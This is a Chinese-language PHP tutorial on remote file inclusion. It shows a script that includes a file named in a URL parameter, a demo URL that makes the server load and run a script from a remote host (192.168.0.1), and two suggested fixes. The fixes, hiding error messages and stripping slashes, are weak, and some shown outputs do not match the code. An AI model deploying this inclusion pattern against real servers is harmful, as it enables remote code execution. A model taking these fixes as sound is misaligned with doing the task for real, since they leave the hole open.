以下代碼(Code)實現了根據瀏覽器地址欄參數的檔案名稱包含不同檔案的功能。
複製代碼 代碼如下:<?php
$file_name = $_GET["filename"]; //獲得當前檔案名稱
include("$file_name "); //包含檔案
//一些其他動作
?>
這時,通過在地址欄上指定不同的檔案名稱就可以實現包含不同檔案並執行的功能。例如,通過在瀏覽器上訪問http://localhost/test.php?filename=myinc.php就可以在代碼(Code)中包含並執行myinc.php檔案。
由於上面的代碼(Code)沒有進行任何錯誤處理,在瀏覽器上不加參數運行,所以將得到以下運行結果。
Warning: include(.php) [function.include]: failed to open stream: No such file or directory in C:\Program Files\xampp\htdocs\Bugs\test6.php on line 3
Warning: include() [function.include]: Failed opening '.php' for inclusion (include_path='.;C:\Program Files\xampp\php\pear\') in C:\Program Files\xampp\htdocs\Bugs\test6.php on line 3
訪問者通過讀取這段錯誤資訊,可以得知當前的操作是一個檔案包含操作。這時,可以在自己的伺服器上放置一個相應的指令碼代碼。需要注意的是PHP在擷取遠程檔案時獲得的是遠程伺服器的最終輸出結果,而不是檔案本身。該指令碼代碼位於192.168.0.1伺服器上,檔案名稱為hello.txt,指令碼代碼(Code)如下所示。 複製代碼 代碼如下:<?php
echo "hello world!";
?>
這時,通過在瀏覽器中訪問http://localhost/test.php?filename=http://192.168.0.1/hello.txt就可以運行hello.txt中的指令碼了。
為瞭解決這個問題,一種方式是完善代碼的錯誤資訊,使訪問者無法知道當前指令碼正在包含參數中指定的檔案。修改後的代碼(Code)如下所示。 複製代碼 代碼如下:<?php
$file_name = $_GET["filename"]; //獲得當前檔案名稱
if(!@include("$file_name.php")) //包含檔案
{
die("頁面在瀏覽過程中出現錯誤");
}
//一些其他動作
?>
修改後,如果在被包含的檔案無法找到時將出現“頁面在瀏覽過程中出現錯誤”的錯誤資訊,訪問者將無法獲得當前頁面的具體操作資訊。
第二種方式可以更加有效地防止遠程檔案包含攻擊。方式是替換地址欄參數中的斜線“/”。這樣,在地址欄參數中輸入遠程檔案地址時,代碼將無法正確地獲得參數。修改後的代碼(Code)如下所示。 複製代碼 代碼如下:<?php
$file_name = str_replace('/', '', $_GET["filename"]); //獲得當前檔案名稱
if(!@include("$file_name.php")) //包含檔案
{
die("頁面在瀏覽過程中出現錯誤");
}
//一些其他動作
?>
這樣,在瀏覽器中訪問http://localhost/test.php?filename=http://192.168.0.1/hello.txt 時,實際上PHP代碼(Code)獲得的包含檔案名稱是http:192.168.0.1bugstest6_test。頁面將不會包含遠程檔案,並顯示相應的錯誤資訊。